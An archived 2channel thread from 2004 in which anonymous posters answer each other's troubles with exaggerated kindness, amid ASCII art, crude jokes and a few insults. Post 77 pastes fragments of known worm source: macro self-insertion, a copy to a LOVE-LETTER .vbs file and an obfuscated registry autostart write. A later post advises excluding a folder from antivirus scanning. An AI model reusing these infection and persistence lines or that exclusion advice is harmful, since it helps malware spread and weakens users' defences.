2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

みんなが気持ち悪いぐらい優しいスレ。

1 :のほほん名無しさん:04/05/17 10:16 ID:???
さあ、今日は休んで明日から頑張ろうよ!!

2 :のほほん名無しさん:04/05/17 10:22 ID:???
>>1
今年は休んで来年から頑張ろうよ!!

3 :のほほん名無しさん:04/05/17 10:22 ID:???
2get

4 :のほほん名無しさん:04/05/17 10:24 ID:???
>>3
気にしないで!!
2なんて取ってもしょうがないじゃん!!

5 :のほほん名無しさん:04/05/17 11:32 ID:???
>>3
そうだよ!俺なんか『2get!』って書いて>>5だったことあるよ!
気にスンナ!!


6 :のほほん名無しさん:04/05/17 11:55 ID:nEquNAel
>>3
ヾ(^^ゞ))..( シ^^)ツ_フレーフレー >>3さん♪

7 :のほほん名無しさん:04/05/17 12:48 ID:1VKxyyyH
>>1-1000
みなさん愛してますよ

8 :のほほん名無しさん:04/05/17 13:53 ID:???
ニュー速のニューヒーロー「からとみ」が2ゲットしたぜ!

>>3 何でかしらないけど止められねーよ 風呂でションベンだけは
>>4 災害とかで人がたくさん死ぬとワクワクしてしまう僕です
>>5 見たくもないのに見せるの駄目だけど、見たい人が見てるならいいだろ
>>6 ○○○からとみに○○という言葉はどういう意味なのでしょうか
>>7 このスレを切除してください。 僕にずっと粘着的にしてきます。
>>8 ○○をあらわにする。っていう言葉の使い方はありますか?
>>9 俺が国訴的なものをしたらどうなるんだろうね?と警告しておく

>>10-1000
お前らが、今度ミスしたらとことん晒して粘着してやるからな!覚悟しとけよヴォケども!

9 :のほほん名無しさん:04/05/17 13:55 ID:???
>>8
大丈夫、人生まだやり直せるよ。
戦ってみようよ、現実と。ぼくができることなら何でもするよ。

10 :のほほん名無しさん:04/05/17 14:06 ID:nEquNAel
>>8
うんうん、大丈夫。
訳わからないレスでも、空気壊したって、気にすんな。
怒っても何言っても仕方ないさ。意味ないよ。がんばれ


11 :のほほん名無しさん:04/05/17 14:39 ID:Uj/OmAcx
>>7
ありがとう!!

12 :のほほん名無しさん:04/05/17 14:40 ID:Uj/OmAcx
>>7
ああ、IDも素敵だね!!

13 :なー:04/05/17 14:46 ID:Bh8dLVtb
ttp://jotohe.hp.infoseek.co.jp/torauma2.swf

14 :のほほん名無しさん:04/05/17 15:07 ID:???
うるせーばか

15 :のほほん名無しさん:04/05/17 15:16 ID:???
>>13
ああ、元ネタは見たこと有るけど、これは初めてだよ!
面白いFlashを紹介してくれてありがとう!

>>14
だめだよ!
そんな事いってると、心まで荒んじゃうよ!


16 :のほほん名無しさん:04/05/17 15:31 ID:1VKxyyyH
>>14
仲良しビーム!(ノ≧∀≦)ノ・‥…━━━★ピキューン!

17 :のほほん名無しさん:04/05/17 17:52 ID:???
友達が欲しい

18 :のほほん名無しさん:04/05/17 17:58 ID:???
ぬるぽ

19 :のほほん名無しさん:04/05/17 18:18 ID:nEquNAel
>>17
何言ってんだよ、ここに俺がいるじゃないか

20 :のほほん名無しさん:04/05/17 18:27 ID:???
>>17
何言ってんだよ、ここに俺がいるじゃないか

21 :のほほん名無しさん:04/05/17 18:36 ID:???
友達デキタ━━━ヽ( ゚∀゚)人(゚∀゚ )メ( ゚∀゚)人(゚∀゚ )メ( ゚∀゚)人(゚∀゚ )ノ━━━!!!!


22 :のほほん名無しさん:04/05/17 18:40 ID:???
彼女いない暦=年齢ですが何か?

23 :のほほん名無しさん:04/05/17 18:46 ID:???
>>22 普通の事じゃん。 気にするな

24 :のほほん名無しさん:04/05/17 18:56 ID:nEquNAel
>>22
大丈夫だ、俺もそうだ。
きっと優しい誰かが彼女になってくれるよ

25 :のほほん名無しさん:04/05/17 19:27 ID:8DM8Insz
             /ヽ       /ヽ
            / ヽ      / ヽ
  ______ /U ヽ___/  ヽ
  | ____ /   U    :::::::::::U:\
  | |       // ___   \  ::::::::::::::|
  | |       |  |   |     U :::::::::::::| なにこのスレ……
  | |      .|U |   |      ::::::U::::|
  | |       | ├―-┤ U.....:::::::::::::::::::/
  | |____ ヽ     .....:::::::::::::::::::::::<
  └___/ ̄ ̄      :::::::::::::::::::::::::|
  |\    |           :::::::::::::::::::::::|
  \ \  \___      ::::::



26 :のほほん名無しさん:04/05/17 19:36 ID:???
そんなこと言わないでおいでよ。
一緒に話そうよ。

27 :のほほん名無しさん:04/05/17 19:41 ID:8DM8Insz
             /ヽ       /ヽ
            / ヽ      / ヽ
  ______ /U ヽ___/  ヽ
  | ____ /   U    :::::::::::U:\
  | |       // ___   \  ::::::::::::::|
  | |       |  |   |     U :::::::::::::| なんかキモイよ・・・・
  | |      .|U |   |      ::::::U::::|
  | |       | ├―-┤ U.....:::::::::::::::::::/
  | |____ ヽ     .....:::::::::::::::::::::::<
  └___/ ̄ ̄      :::::::::::::::::::::::::|
  |\    |           :::::::::::::::::::::::|
  \ \  \___      ::::::





28 :たー:04/05/17 19:44 ID:6BgQ+45f
寂しいときはオイラが抱かせやる

29 :22:04/05/17 19:55 ID:???
みんなありがとう
元気出てきたよ♪  Å
   ♪   / \   ランタ タン
      ヽ(´Д`;)ノ   ランタ タン
         (  へ)    ランタ ランタ
          く       タン

30 :のほほん名無しさん:04/05/17 19:57 ID:???
糞が

31 :のほほん名無しさん:04/05/17 19:59 ID:+Ioj1V+Y
今日警察に捕まって2万円取られました
慰めてください(;ω;)

32 :のほほん名無しさん:04/05/17 19:59 ID:k2Ve7kUO
俺包茎なんです
誰か童貞奪ってください

33 :のほほん名無しさん:04/05/17 20:00 ID:???
>>31
や ら な い か?

34 :のほほん名無しさん:04/05/17 20:02 ID:???
>>31 糞がどうしたの?包み隠さず聞かせて。

>>32 もしここが掲示板じゃなかったら君の魅力に引きこまれてると思う。

35 :のほほん名無しさん:04/05/17 20:05 ID:???
>>34
俺はお前嫌だ
ぶさいくだもん

36 :のほほん名無しさん:04/05/17 20:07 ID:???
>>35
君が好きだよ

37 :のほほん名無しさん:04/05/17 20:08 ID:???
俺は嫌いだよ

38 :のほほん名無しさん:04/05/17 20:15 ID:???
>>31捕まった理由を話してごらん。

39 :18:04/05/17 20:20 ID:???
誰もガッしてくれない・・・



40 :のほほん名無しさん:04/05/17 20:46 ID:???
>>39
チューならしてやる

41 :のほほん名無しさん:04/05/17 21:07 ID:???
>>40
                          γ" ̄ ̄ ̄`v' ̄ ̄ ̄ ̄ヽ
               ,,____,-、       /  ,,          は   'i
             ∠、_,,-─`;i        ,l キ  ド     い   'l,
  、,从,、,        /ヲ;!::!令、;/'l      l  モ  エ        ,,   ,|
  } ギ 《      c,!`''<、 `- '゙`lリ>   < "ォ  レ     そ   ,|
  》 リ .{       ,! ト='ニ) イ |      l  l   l      こ   ,|
  } ッ 《      ,! E=ミ,ノ l |       | イ         "    |
  ~/v'`       ヽ、     |       l,  ゚    ,人       ,!
              ス[F二ルニ]/~つ、  ヽ、,,__ノ  ヽ、,,__,,ノ
            /~,,_,,-─'"(`っ`l、リリ 
          /~二__ノ''リ`−'"イ ヽ
        / ̄ ̄  ,,/  、'i  /L ,,ゝ
       /,,−┬┬''||    `i'   ノ !, |
  、,从,、,// ,l':::::L ||;;;;||    ,,,ト−'"  レ
  },ビ 《/  /::::::|レ、||;;;;ヽ    l ┃┏━┓
  》 キ .{  :::::::::/ス イ、;;;;ヽ     :::┃  ┏┛
  { ッ ゝ:::::::::::::i':::::/::ヽ、;;;;ヽ、  ::: ・  ・  
  ''/v'`/ :::::::/ ::::<_(^^)=ヾ;;;ヽ!:::::::

42 :のほほん名無しさん:04/05/17 21:13 ID:nEquNAel
>>41
なに照れてるんだい?
このスレの趣旨はわかってるだろう?
そんなに怖がらなくても大丈夫だよ。

43 :のほほん名無しさん:04/05/17 21:19 ID:???
>>41

               _,.-‐'"⌒ ー- 、
             , -'",,.-‐''" ,,.- ` へ⌒ヽ.
            / / /////   ヽ  ヽ
           / /  / / / / /   ,i i ト、  ヽ
         / //  / / / / /  ,イ ノ} ノlト、 ヽ  l
         / / ,イ/ / { ,!,イ ,イ .///.// ノ }i i  |
        / / /l l | Ll,,ィl-ト/| /ノ/,//- 、 ii l i }
        | ! { l { |lイ V Vレ | /ノ ノ    ゙ |l lノ .l
        l l 人、ヽ{V_   _-レ    ー_  _ .}l ll l
        ゙l l { トヾkモ'''''""゙゙゛    "''''''''゙`ル'彳 |
        ヽヾ{ ヾミヽ`////  i   //// iiイノ i.l   
           ト 、 入     _,_._     ィ|'   ハ
         ノト, \ \    -      /l|  /i  \
          //ノ  ヽ  }ヽ、      イ lレ'ハノ ト 、_ ヽ
     r'⌒`''" _   ノ } l | ` ー ''"  |/ /ヽ ヽ、 ヽ )
    ヽ(  /  ノ ノ ノ ^|       / /{  ヽ   ) ノ
    __y/  _,/ イ_/ { ノ        { .{ `ヽ、 ゙ト- 、{___
  /,フ',イ  / / //"    |、      ,ネ、 ヽ   ヽ}、 // /ー、
  ({ /:::{ / ノ { {     l ヽ   ´ / `ー゙ 、(__ノ )/ /:::/::}
  V:::::::ヽ{ {   トヽ__)    l      /     }  i.// /::::{::::::l


44 :のほほん名無しさん:04/05/17 21:33 ID:???
釣れた釣れたw

45 :のほほん名無しさん:04/05/17 21:44 ID:???
みんな、やぁ〜すぁ〜すぃ〜いぃ〜。

46 :のほほん名無しさん:04/05/17 21:50 ID:???
>>45
死ね

47 :のほほん名無しさん:04/05/17 21:50 ID:???
失恋しますた。私彼氏にとってなんだったんだろ、、、(´・ω・`)

48 :のほほん名無しさん:04/05/17 22:10 ID:???
便所

49 :のほほん名無しさん:04/05/17 22:13 ID:nEquNAel
>>47
つらかったろう?
でも大丈夫だよ。彼は>>47さんの人生の糧となったからね。


50 :のほほん名無しさん:04/05/17 22:17 ID:nEquNAel
>>44
喜んでくれたかい?よかったよかった。

>>46
気にすんな。カリカリしてもしかたない。

>>48
便所は汚いイメージだけどなくては困る。ないと自分自身が苦しく汚い
思いをするからね。有難い場所だ。

51 :のほほん名無しさん:04/05/17 22:21 ID:???
>>46
またまた照れちゃってw
短いレスにも、君の人の良さがにじみ出てるよ!!

>>47
ここでは、思い切り泣いても愚痴ってもいいんだよ。
ゆっくり考えればいいじゃないか!!

52 :のほほん名無しさん:04/05/17 22:34 ID:???
キモインダヨ

53 :のほほん名無しさん:04/05/17 22:38 ID:nEquNAel
>>52
しょうがないな(笑)
まだ慣れてないんだね。大丈夫だよ。落ち着いて。

54 :のほほん名無しさん:04/05/17 22:49 ID:???
>>52
愛をあげるからこっちにおいで

55 :のほほん名無しさん:04/05/17 23:37 ID:???
良スレですね。

56 :のほほん名無しさん:04/05/17 23:48 ID:nEquNAel
>>55
ありがとう。といっても俺がスレ主じゃないんだけどね。
このスレ主さんと55さんにはきっといいことあるよ。

57 :のほほん名無しさん :04/05/17 23:55 ID:???
大好きな人がいじめにあっています。どうすればいいですか?

58 :のほほん名無しさん:04/05/18 00:23 ID:9jiY1sVf
>>57
よし、俺が力貸そう!
どこのどいつだ?57さんの好きな人をいじめるバカモノは!!

…マジで同じような経験あったよ。職場でね。
全力でかばって力になってやれ。57さんが株上げるチャンスでもあるしね。
好きだったらできるだろ。相談はのるぞ。がんばれ!応援してる。

59 :のほほん名無しさん:04/05/18 00:45 ID:???
>>58
ありがとう!その子にも教えてあげたいです。

同じ職場でもなければ今、近くに住んでるわけでもないので
電話で話を聞くしかできなくてすごく辛いです。
泣いてる話を一緒になって泣いて、頑張って!ってしか言えないし。
その辛い局面で私が助けてあげれるわけでもないし・・・。

でもここで少し話し聞いてもらえたから私まで鬱になってしまう。
とかはなくしっかり支えてあげれそうです。
また辛くなったら相談させて下さい。

60 :のほほん名無しさん:04/05/18 00:52 ID:???
夜中にどうしようもなく寂しくなるのはどうしたらいいんでしょうか。+゚(゚´Д`゚)゚+。

61 :のほほん名無しさん:04/05/18 00:56 ID:???
>>60
。+゚(゚´Д`゚)ヽ(・ω・ )私がいるよ。ヨシヨシ

62 :のほほん名無しさん:04/05/18 01:01 ID:???
みんな優しすぎる・・・てかこれは寧ろ気持ちイイ!

63 :60:04/05/18 01:04 ID:???
>>61ありがd(つД`)ほんと優しい。。。
>>62禿同!!

64 :のほほん名無しさん:04/05/18 01:09 ID:???
>>62
>>63
そう思える2人も優しい・・・(*´∀`*)

65 :のほほん名無しさん:04/05/18 01:32 ID:9jiY1sVf
>>59
俺の場合も、よく彼女が泣きながら電話してきたよ。
深夜でもね。
そんな時はとにかく聞き役に徹したよ。そして励ました。
どうしてもあげられない気持ちはわかるよ。
でも話しを聞いてあげる、愚痴をきいてあげる、そしていつも味方に
なって安心させる。だから今の57さんのそれだけでもかなり違うと思う。
がんばれ!そしてその好きな人もがんばれ!!!味方は多いぞ。


66 :のほほん名無しさん:04/05/18 01:36 ID:???
今年大学卒業なのに就職活動してない。
どうすればいいんだろう
多分この先の人生暗いな・・・

67 :のほほん名無しさん:04/05/18 01:38 ID:???
>>60
べろべろばー      うほほほほ
   おチンチンびろーん ∩___∩
   ∩___∩      | ノ  ○─○ヽ_∩__∩ にひゃひゃひゃひゃひゃ
   | ノ      ヽ/⌒)  /  /3   3 |      ヽ 
  /⌒) (゚)   (゚) | .|   |    ( _●_) |o⌒  ⌒o|
 / /   ( _●_)  ミ/∩―−、   |∪| /⌒(_●_)⌒ ミ
.(  ヽ  |∪|  / / (゚) 、_ `ヽ ヽノ |   |∪|  /
 \    ヽノ /  /  ( ●  (゚) |つ  ∩.  ヽノ∩
  /      /  | /(入__ノ   ミ   | ノ⌒  ⌒ヽ
 |   _つ  /    、 (_/    ノ  /  (。)(゚)|     
 |  /UJ\ \   \___ ノ゙ ─ー|  (⌒_●⌒)ミ      
 | /     )  )    \       _彡、/ |U  UU_/      
 ∪     (  \     \     \   | |     ||
        \_) あびゃばばばだーん . .| |nn _nn||  ぐへへへへへへ
                          \___) ッ

元気だしなよ



68 :のほほん名無しさん:04/05/18 01:46 ID:???
みんなおやすみ。また明日から頑張ろうね。(ノ∀`)オヤスミー

69 :のほほん名無しさん:04/05/18 01:48 ID:???
おやすみなさーい(´-ω-`)zZZみんないい夢を。。。

70 :のほほん名無しさん:04/05/18 01:51 ID:9jiY1sVf
>>66
今からそんなこと言ったら俺はどうなるんだ。
この春38で今まで15年間勤めた仕事を辞めて無職だぞ。
しかも独身だぞ。仕事ない結婚もできない相手にもされない、
いっきょに転落人生になったぞ。
若いのがうらやましい。何するも若いだけで充分条件いいぞ。
どんな学歴あっても、どんな大手企業勤めても、歳とった無職はダメだ。
若いだけで圧倒的有利だよ。ヤル気さえあればぜったい大丈夫だ!
がんばれ!!
             ・・・誰か俺を励ましてくれ(泣)


71 :のほほん名無しさん:04/05/18 01:58 ID:9jiY1sVf
66-69
皆いいやつだ。いいことすると明日必ずいいことがあるぞ。
では皆さんおやすみなさい。

72 :のほほん名無しさん:04/05/18 02:00 ID:???
>>70タソにもきっといいことがあるよ。 がんばれ。 おやすみ。

73 :のほほん名無しさん:04/05/18 02:05 ID:???
>>70さんの人生なんて、宇宙の歴史から見ればほんの一瞬ですよ!
来世があるじゃないですか!

74 :のほほん名無しさん:04/05/18 02:06 ID:???
>>70さんの今までのレス読む限り、
人間としての魅力もありそうだし、まだまだなんとかなりますよ!
以前に彼女さんもいらっしゃったようだし、まだ出会いはあります。
幾つになってもヤル気で変わると思います!頑張って下さい、応援しています!

75 :のほほん名無しさん:04/05/18 02:14 ID:9jiY1sVf
72-74
ありがとう、ありがとう!みんないいヤツばかりだ!
ぜったい幸せになれるぞ。間違いない!
おやすみなさい。

76 :のほほん名無しさん:04/05/18 03:10 ID:???
あほか

77 :のほほん名無しさん:04/05/18 03:11 ID:???
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

78 :のほほん名無しさん:04/05/18 03:35 ID:CMwGAdvq
人間やればできるさ!!きみらは素晴らしいよ!がんばって生きようぜーーー

79 :のほほん名無しさん:04/05/18 08:00 ID:???
>>77
( ・∀)人(∀・ )通報しますた!

80 :のほほん名無しさん:04/05/18 11:38 ID:???
>>76
ああ、冷静な意見をいえるヒトはカッコいいね。
きっと実社会でもクールなヒトなんだろうね!!

>>77
コンピュータ言語詳しいんですね!!
僕なんか全然分からないよ!!



81 :のほほん名無しさん:04/05/18 11:39 ID:JwdnNiEm
>>78
うん、凄い励まされたよ!!
僕もこれからがんばって大学行くよ!!

>>79
偉い!!正義感あふれるヒトだね!!

82 :のほほん名無しさん:04/05/18 13:26 ID:???
ヽ( ・∀・)ノ●ウンコー

83 :のほほん名無しさん:04/05/18 13:29 ID:9jiY1sVf
>>82
ヽ( ・∀・)ノ●ウンコー ヽ(^^ ) ヨシヨシいーこだ

84 :のほほん名無しさん:04/05/18 13:31 ID:???
≡ (゚(゚(゚(゚∀゚ ) プリ・キュア×4
  ≡ 〜( ( ( ( 〜)          
   ≡  ノノノノ ノ 


 (゚∀゚ ) ≡ プリティでキュアキュア
 (〜 )〜 ≡
 く く ≡


  |  (゚∀゚)人(゚∀゚) ふたりは
 / ̄ノ( ヘヘ  ̄( ヘヘ  


      無職
    ('A`)  ('A`)
    /(  )∨(  )ヽ
     ハ   ハ



85 :のほほん名無しさん:04/05/18 14:22 ID:???
おれがわすれた やさしさ が ここにある・・・

86 :のほほん名無しさん:04/05/18 14:26 ID:???
偽善者共め 糞が

87 :のほほん名無しさん:04/05/18 14:34 ID:9jiY1sVf
>>86
素直になろうよ。そう思った瞬間あなた自身が不幸になっちゃうよ。
このスレの趣旨わかってるよね?照れなくていい。大人になろうよ。
大丈夫、怖くないから。



88 :のほほん名無しさん:04/05/18 14:37 ID:Px3rphwm
86さん鋭い指摘をありがとう。
たしかにボクは偽善者だし、なにかしらの見かえりを
周りに対して欲求してると思う。
でも偽善を働いている自分に、罪を感じている自分が
まだある以上、それはまだ善を失ってないと思うよ。


89 :リリン ◆111HBuO8jI :04/05/18 16:42 ID:???
ここ開いた瞬間にノートンが削除するんですが・・・

90 :のほほん名無しさん:04/05/18 16:54 ID:???
>>89
>>77にあるウィルスのソースコードを
ノートンがウィルス本体だと誤認するんだよ。
2ちゃんブラウザを使ってるなら、
ログのあるフォルダをauto protectから除外することで、
以後ソースコードに反応することはなくなるよ。

91 :リリン ◆111HBuO8jI :04/05/18 16:57 ID:???
優しいつД`)

92 :のほほん名無しさん:04/05/18 18:31 ID:lwG43t8I
>>90
これは2chブラウザがウイルスに感染したって事でつか?

93 :のほほん名無しさん:04/05/18 18:52 ID:???
>>92
感染したように見えるってだけで感染じゃないよ。


94 :のほほん名無しさん:04/05/18 19:03 ID:lwG43t8I
>>93ありがとうございます。まだパソコム買って日が浅いもので
不安でした。ありがとう

95 :のほほん名無しさん:04/05/18 19:05 ID:???
>>94
゜+.(・∀・)゜+.゜ヨカッタネー!!

96 :のほほん名無しさん:04/05/18 22:31 ID:???
俺、糖尿病かもしれないでも保険証ない
低脳大学でおまけに資格もなんにもとらないで
卒業して3年目であさって25になる
日曜日に法事があって親戚とかにきっとバカにされる
行きたくないけど実家暮らしだから行かなきゃいけない
最近も毎日オナニーばかりで眠る時に途中で辞めた大学の部活を
やっときゃ良かったって悔やんで悔やんで眠れなくて朝を迎える
明日は雨の中、バイトに自転車でいかなきゃいけない
大学時代俺がバカにしてたデブは資格とって就職した。
すごく悔しい自分が惨め、だけど時は戻らない

97 :のほほん名無しさん:04/05/18 23:26 ID:9jiY1sVf
>>96
なぜフリーターの25歳で惨めなんだ?
他のヤツが就職しようがどうしようが、他人の生き方に自分を比較なんて
できないよ。どっちが勝った負けたなんて誰にもわからない。
いい人生かそうでないかなんて本人の気持ちしだいだと思わないか?
他人の視線気にしても意味ないし、後悔しても時間は戻らない。だったら
考えても具合悪くなるだけだから一切考えるな。もうこれ以上反省もしなくて
いいよ。充分だ。マラソンの高橋選手が言ってたぞ。どんな人間でも誰でも、
必ずチャンスはある。ただ見逃してるだけだって。よく注意してみれば必ず
転がってるって。彼女もあの監督との出会いがなければ、オリンピックも
世界記録もないし、マラソン選手としても誰も知らないマイナー選手で
とっくに辞めてただろう。ぜったいあきらめるなよ。チャンス見つけろ。
いいか、過去はいっさい考えるな。これからのこと考えよう。大丈夫!
保険だけは加入しといたほうがいいよ。


98 :のほほん名無しさん:04/05/19 00:24 ID:???
うっせえな。チャンスがあってもそれをつかめなきゃ意味ねえだろ
俺なんてチャンスが転がっててもどうせ途中で怖くなってやめるんだ
他人が怖いけど、一人でも何もできない。昔は死のうと思ってたけど
最近は死ぬのがとても怖い。なんとなく死にたくない、でも今更そんな事言っても
やばいし。怖いよ。俺、ホントに何もできないし

99 :のほほん名無しさん:04/05/19 00:34 ID:???
っていうかおまえら臭すぎ

100 :のほほん名無しさん:04/05/19 00:43 ID:???
100だな。

101 :のほほん名無しさん:04/05/19 01:04 ID:???
どうせだったら女に優しくされたいな

102 :のほほん名無しさん:04/05/19 01:07 ID:vblVda+P
>>98
なぜチャンスはつかめないなんてもう決めてるんだ?
それはあきらめてるのか?
これから一生探し続けるんだ。誰だって試行錯誤してもがき苦しんで
探すんだよ。あきらめたらその時点で終わりだな。なにもお前だけ
じゃない誰でもそうだ。あきらめたらおしまい。
怖いと感じるのは考えがマイナス思考なんだよ。すべて悪いほうへ
考えるからだ。がんばれとは言わない。意識して悪いことだけは
考えるな。いいことだけ考えろ。発想の転換でプラス思考だけでも
かなり違うぞ。死ぬのが怖いのは健全な証拠だ。死ぬ気になったら
なんでもできるからな。
おまえならできる。ぜったい大丈夫だ。そこまで自己分析できるなんて
たいしたヤツだよ。男が怖いなんて素直に言えるなんてなかなか
できないぞ。自分の弱い部分を他人にさらけだせるのは、根性ある
証拠だ。大丈夫だよ。
慌てないでじっくりやれや。人生転んだほうが出来た人間になれるぞ。



103 :のほほん名無しさん:04/05/19 01:10 ID:vblVda+P
>>99
そんなこといいじゃないですか。
こんなところがあってもうれしいですよ

104 :のほほん名無しさん:04/05/19 01:11 ID:vblVda+P
>>100
(^ ○ ^)お!(^ □ ^)め!(^ ◇ ^)で!(^ ▽ ^)と!(^ ・ ^)う!

105 :のほほん名無しさん:04/05/19 01:11 ID:???
>>99
ああ、一見、ただの煽りに見えたけど、
実は>>100さんに100getを譲ってあげてたんだね!!
優しいヒトなんだ、>>99さんは!!

>>100
オメデトウ!!今日はイイことあるといいね!!

106 :のほほん名無しさん:04/05/19 01:13 ID:vblVda+P
>>101
ごめんよ。
女だったら気持ちわるくならないじゃないですか。
気にしないでくれ。誰か相手にしてくれる時もあるよ。

107 :のほほん名無しさん:04/05/19 01:17 ID:vblVda+P
>>105
そうだったんだ。俺はバカだから気づかなかったよ
>>99さん、ごめんよ。イイヤツだな。キミは自分を悪者にして他人に
譲るタイプだったんだね。
それに教えてくれた>>105さんありがとう。キミもすごくいいヤツだ。

108 :のほほん名無しさん:04/05/19 01:53 ID:mNfzZh+n

            / ヽ      / ヽ
  ______ /U ヽ___/  ヽ
  | ____ /   U    :::::::::::U:\
  | |       // ___   \  ::::::::::::::|
  | |       |  |   |     U :::::::::::::| なんかキモイよ・・・・
  | |      .|U |   |      ::::::U::::|
  | |       | ├―-┤ U.....:::::::::::::::::::/
  | |____ ヽ     .....:::::::::::::::::::::::<
  └___/ ̄ ̄      :::::::::::::::::::::::::|
  |\    |           :::::::::::::::::::::::|
  \ \  \___      ::::::



109 :のほほん名無しさん:04/05/19 05:38 ID:???

   ///       ,i              ヽ
      |     ,ヽ、 | ヽ  |ヽ_           i
      Vヽ|\| __.|  \|  _、_        |
         | ´ _`    ´_  ヽ      |
         | ゙〒.T`     'T 〒"レ     .|'
         | _{つ|     |つ}_ |/⌒i    |
         | "  ̄       ̄ ゙  i⌒.|   |
           i  /ハ  (|   /ハヽ  > .!  |'
         !             |-´  /
          \    ー一     ,イ   レ'
           \    -   / .|_ノ'´
             ` T   ´   |               by     っ
           _ -|      /   |- _           彳育攵 つ
      /,  ̄            _     ̄ ヽ  

110 :のほほん名無しさん:04/05/19 15:43 ID:???

ttp://that3.2ch.net/test/read.cgi/bouhan/1081219798/213-218

問題が解決した時に気が軽くなってちょっと書いてしまったんです。
自分の言葉使いも悪かったり、レスされた内容もわかるからこそへこむ…。

23にもなって男2人のセールスマンを断れず、祖母の事を心配してと
思ったらただの余計なお世話でしかなく、父親に尻拭いしてもらって…。
大学行かせてもらったのにまともな職に就けず、こんな事で家族の役にも立たず
将来本当に騙されてどん底に落ちていくんだろうと思い始め・・・。
もうここ1週間くらい過去最高のリアルで_| ̄|○状態。胃が痛たいよ…。

こんなダメ人間ですが、誰か励ましてください。

111 :のほほん名無しさん:04/05/19 18:23 ID:vblVda+P
>>110
最近本当にあの手この手の悪質勧誘・販売があるから気をつけないとならないね。
もう徹底して言い寄ってくる甘い話は危険だと認識して100%断るものと
考えないとダメだね。こんな優しさや弱みにつけ込む悪質業者は許せない。
基本的に110さんはイイヤツだよ。すごくイイヤツなんだね。なぜダメ人間
なんだ?反対だよすごくイイヤツだよ。セールスは絶対家に入れちゃダメ
だね。そこでアウト。そうなってはなかなか断れないよ。門前払いで話を
絶対聞かない、が原則。おばあさんに徹底してもらわないとたいへんだ。
たぶんその状況になると110さんが追い出すのは難しいでしょう。
ある程度社会経験積んだ男性に、スゴミ聞かせて違法侵入ということでおどし
かけないとならないね。相手は口がうまいから口だけで追い出すのは110さん
には無理だよ。相手はプロだよ。
そんなに自分を責めないでいいよ。いいクスリと思って、社会勉強したと
思うだけでいい。そんなうまくいかないこともあるさ。運がないこともある。
正直者がバカみることもある。でもだからといって捻くれたらおしまい。
今のままでいいと思う。そんな日頃の善行は必ず誰かが見てくれてるから。
これからもずっとメゲずに、今のまま優しい110さんでいてください。

112 :なもすけ ◆Namo.egAas :04/05/19 18:53 ID:???
>>110
見てきた。酷いレスついてるね。
裏社会カテゴリは頭イカれた人多いからキニスンナ(゚ε゚)
お父さん処理してきてくれてヨカタネ。
次気をつければいいことだし、やっぱりキニスンナ(゚ε゚)

113 :のほほん名無しさん:04/05/19 22:37 ID:???
優しくして

114 :のほほん名無しさん:04/05/20 00:11 ID:wNNYUtKv
>>113
どうしたの?何かあった?

115 :のほほん名無しさん:04/05/20 02:59 ID:???
>>113
死ね

116 :のほほん名無しさん:04/05/20 03:41 ID:???
>>113
ヽ(゚Д゚ )ヨシヨシ ヽ(゚Д゚ )ヨシヨシ ヽ(゚Д゚ )ヨシヨシ ヽ(゚Д゚ )ヨシヨシ ヽ(゚Д゚ )ヨシヨシ 


>>115ヾ(゚-゚*)ダメダメ 

117 :110:04/05/21 00:53 ID:???
>>111-112
お2人とも励ましてくれてありがd。優しい・・・つД`)
なんとか_| ̄|○状態から前向けるようになりそうです。

111さんの仰るとおり今回は良い社会勉強になったと思うようにします。
家族全員で今後被害にあわないためにも対策を立てようとの事で
色々話し合ってます。

皆さんも訪問販売には気をつけてください。
皆さんご存知の方も多いとは思いますが、もしご自身やご家族が被害に
あわれたら悩む前に即消費生活センターに相談した方が早いですよ。
ちょっと板違いなお話でスマソ。

118 :のほほん名無しさん:04/05/22 02:18 ID:???
優しさなんて(゚听)イラネ

35 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)